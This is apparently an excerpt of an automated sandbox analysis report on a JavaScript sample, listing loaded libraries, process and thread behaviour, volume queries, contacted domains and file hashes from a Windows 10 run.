Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5564			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4307			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3392	Thread sleep count: 5564 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3392	Thread sleep count: 4307 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6404	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\net.exe TID: 7072	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1616	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
x1.i.lencr.org	unknown	unknown

ID:	1592151
Product:	CloudBasic
Start time:	20:41:08
Start date:	15.01.2025
Sample:	1647911459241874440.js
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	0093191d26bb386eb24bcb6c56335bad
SHA1:	81f922b94bc687c709e28400825ca4b143ef601b
SHA256:	7453ba23481aacc86986f5009f0bb2a0f8d0b5d5a7848f0f70ce6c9338f4e011

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	1AD20DB1FAD6F10FB1C1FB890E8A2045	DF5FB7FF0970285D8F4BBCCED4F8CB8BF082B933	50786059406571F97BF1ED466E84D33F0E7E625AAC9FBD15ECEB0E4730FC2130
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage user DataBase, version 0x620, checksum 0x3af259e3, page size 16384, DirtyShutdown, Windows version 10.0	B69B318228EB334976E4A7D048508ABC	FB02EFE001273A65FB0002E20E9580DE6B7A5ABA	85DA487DDBF3F0C524996C9E3EEBDD029A22B1F32DE21F8A602DE709C3AC908E
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	6E11622C68331F885D4E8741F17BD893	9114967A6D90FA7AF5D87E53925207AD6349EC81	FEEF74BD77350221B7E1F7FA6A6132D8DCF22580BD09F213740DEFAED020DFD9
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG	ASCII text	D1211A970845E547AE789EF49D85553B	65713D96CCD6087CCE1BBD39BD7F70B924718C08	A0253D9D03707A0B3E521C205C61BE3A87D0267750A95D2EAB7DF35081A1330F
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)	ASCII text	D1211A970845E547AE789EF49D85553B	65713D96CCD6087CCE1BBD39BD7F70B924718C08	A0253D9D03707A0B3E521C205C61BE3A87D0267750A95D2EAB7DF35081A1330F
